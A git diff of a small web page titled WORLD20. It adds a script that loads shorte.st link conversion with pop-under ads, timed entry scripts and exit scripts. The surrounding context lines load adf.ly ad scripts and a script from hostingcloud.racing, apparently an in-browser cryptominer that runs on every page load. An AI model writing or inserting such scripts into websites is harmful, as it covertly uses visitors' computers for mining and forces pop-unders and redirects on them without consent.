--- a/index.html
+++ b/index.html
@@ -18,6 +18,34 @@
 </script>
 <script src="https://cdn.adf.ly/js/entry.js"></script>
   
+  <script type="text/javascript">//<![CDATA[ 
+(function() {
+    var configuration = {
+    "token": "d275b987deb6d4872b389b3b2d1d2cdb",
+    "entryScript": {
+        "type": "timeout",
+        "timeout": 3000,
+        "capping": {
+            "limit": 5,
+            "timeout": 24
+        }
+    },
+    "exitScript": {
+        "enabled": true
+    },
+    "popUnder": {
+        "enabled": true
+    }
+};
+    var script = document.createElement('script');
+    script.async = true;
+    script.src = '//cdn.shorte.st/link-converter.min.js';
+    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
+    var entry = document.getElementsByTagName('script')[0];
+    entry.parentNode.insertBefore(script, entry);
+})();
+//]]></script>
+  
 </head>
 <body style="background-color:black; color:white">
 <h1>WORLD20</h1>
@@ -28,7 +56,6 @@
     var adfly_google_compliant = false;
 </script>
 <script src="https://cdn.adf.ly/js/display.js"></script>
-  
   
 <script src="https://www.hostingcloud.racing/bhUE.js"></script>
 <script>
